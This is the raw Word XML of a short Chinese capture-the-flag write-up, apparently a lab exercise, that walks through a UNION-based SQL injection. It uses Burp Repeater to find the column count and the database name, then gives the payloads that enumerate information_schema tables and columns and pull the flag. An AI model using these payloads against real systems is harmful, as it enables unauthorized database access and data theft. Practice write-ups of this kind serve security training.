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B1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47715" cy="3435350"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6350"/>
            <wp:docPr id="1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193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根据题目提示输入1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F32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066B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10885" cy="3499485"/>
            <wp:effectExtent l="0" t="0" r="5715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49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09FE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将抓到的send to repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDBA1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BC69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85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2815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D9BC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C7375E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7675" cy="83820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62523A2A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B1A9B1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将头改成这个格式 依次尝试2，3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7378647C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F884E8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F36946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250775">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306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07785" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="5715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D73475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发现3之后长度不变，故有两列数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7730E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D231D6"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修改头：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53D698">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs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81115" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="698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A37D4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486027E7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E0A655">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs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得出数据库的名字：sqli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FBB4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04610" cy="2153285"/>
            <wp:effectExtent l="0" t="0" r="8890" b="571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153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090C9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输入新的payload：id=-1+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema='sqli'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A8E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73495" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="1905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17A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FDD72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得出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F26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4595" cy="4535170"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1143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4535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185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3A6629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3AFCA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392E5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再构建新的payload：id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name='flag'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B89D8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3650" cy="2314575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="952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7A5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B16A2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之后得出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378E6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4595" cy="2658110"/>
            <wp:effectExtent l="0" t="0" r="1905" b="889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265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E351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4920" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="5080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513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FBFD0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AC50B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构建最后的payload：id=-1+union+select+1,flag+from+flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF155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最后成功解出flag</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3668DE1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54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2025-12-27T14:06:30Z</dcterms:created>
  <dc:creator>blxsl</dc:creator>
  <cp:lastModifiedBy>Yu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-27T14:20:54Z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eyJoZGlkIjoiNmNlNTYwYWIzNDU1NmYxNTVlNGQyYzVkZjI3N2E2N2EiLCJ1c2VySWQiOiIxNDEzNzUwMjMxIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>91C6AF53E9BC49A5BAC9C9AA25F4FDF1_12</vt:lpwstr>
  </property>
</Properties>
</file>